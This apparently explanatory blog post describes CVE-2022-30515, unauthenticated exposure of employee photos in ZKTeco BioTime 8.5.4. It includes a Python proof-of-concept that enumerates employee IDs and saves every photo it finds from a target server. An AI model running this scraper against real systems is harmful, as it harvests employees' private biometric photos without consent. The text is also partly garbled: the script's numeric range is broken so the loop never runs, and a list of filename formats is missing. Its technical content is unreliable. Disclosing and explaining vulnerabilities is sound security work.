CVE-2022-30515 - How ZKTeco BioTime 8.5.4 Exposes Employee Photos Without Authentication

In today’s world, employee privacy is not just a company matter—it's the law in many places. Any leak of personal data, like employee photos, can have social, legal, and financial impacts. This long read will walk you through CVE-2022-30515, a security vulnerability found in ZKTeco’s BioTime 8.5.4 time and attendance solution.

With this vulnerability, attackers can sneak into employee image folders without even being logged in. We'll break down what the issue is, show you code snippets, describe how attacks work, and provide the original research links—all in simple, direct language.

What is ZKTeco BioTime?

ZKTeco BioTime is a web-based software system for managing employee attendance based on biometrics like fingerprints or faces. Businesses often use it to track when employees check in and out. If your company has fingerprint or face scanners at the entrance—it could well be running ZKTeco.

Employee data, including their photos for biometric identification, are stored on the server running BioTime.

What is CVE-2022-30515?

CVE-2022-30515 is a security flaw in ZKTeco BioTime 8.5.4, where the application saves employee images in directories everyone can access without login or authentication. That means, someone just visiting the right web address can see employee photos directly—no username or password required.

Risk: Exposure of private employee photographs.

- Attack Prerequisite: Hacker only needs network access to the BioTime web server (for example, same WiFi, VPN, or an exposed server on the Internet).

The Problem: No Checks, No Privacy

BioTime 8.5.4 places uploaded employee photos inside one or more web folders. There is no check to see if a user is logged in before allowing access to files in these folders.

Photos might end up stored here on the server

/biotime/media/employee_photos/

Or accessed via URLs like

http://<biotime-server>/media/employee_photos/100023.jpg

There is no need to log in to visit that URL and see the image. You can just paste the web link in your browser, and—if you can guess or enumerate the file name—you will see the photo.

Find a Valid Image URL:

Employee images often follow predictable naming conventions, like employee or user IDs. Common formats are:

Enumerate Filenames:

Write a script to cycle through thousands of possible numbers in the filename, to see which ones exist.

Example: Python PoC Snippet

import requests

base_url = "http://<biotime-server>/media/employee_photos/";
for emp_id in range(1000001, 100010):
    for ext in ["jpg", "jpeg", "png"]:
        url = f"{base_url}{emp_id}.{ext}"
        response = requests.get(url)
        if response.status_code == 200:
            print(f"Found image: {url}")
            with open(f"{emp_id}.{ext}", "wb") as f:
                f.write(response.content)

Replace <biotime-server> with your target IP/hostname.

This code tries different employee IDs with different file extensions and saves the images it finds.

Attacker visits the public folder in the browser:

http://192.168.1.100/media/employee_photos/

Employee photo is displayed directly in browser

!Example Employee Photo

Why Is This Bad?

- Privacy Violation: Personal information, like employee faces, becomes public to anyone on the network.

Solution & Fix

ZKTeco fixed this issue in later releases. The folder now requires authentication—you have to be logged into BioTime to access photos.

Official Reference Links

- NVD - CVE-2022-30515
- Packet Storm Security Advisory
- ZKTeco BioTime official site

Final Thoughts

CVE-2022-30515 is a textbook example of how web apps must not assume folders or files are "internal" just because of their name or location. If you run BioTime or any similar HR/attendance tool, don’t take privacy for granted—always keep your software up to date, and make sure sensitive resources are protected by strong checks.

If you want to check your own company's exposure, simply try accessing the /media/employee_photos/ folder on your BioTime server. If you see photos without logging in, you need to update—fast.

Stay safe, and always respect employee privacy.

*Written exclusively for your awareness. Sharing this knowledge is the first step to safer workplaces.*

Timeline

Published on: 11/08/2022 23:15:00 UTC
Last modified on: 11/09/2022 16:32:00 UTC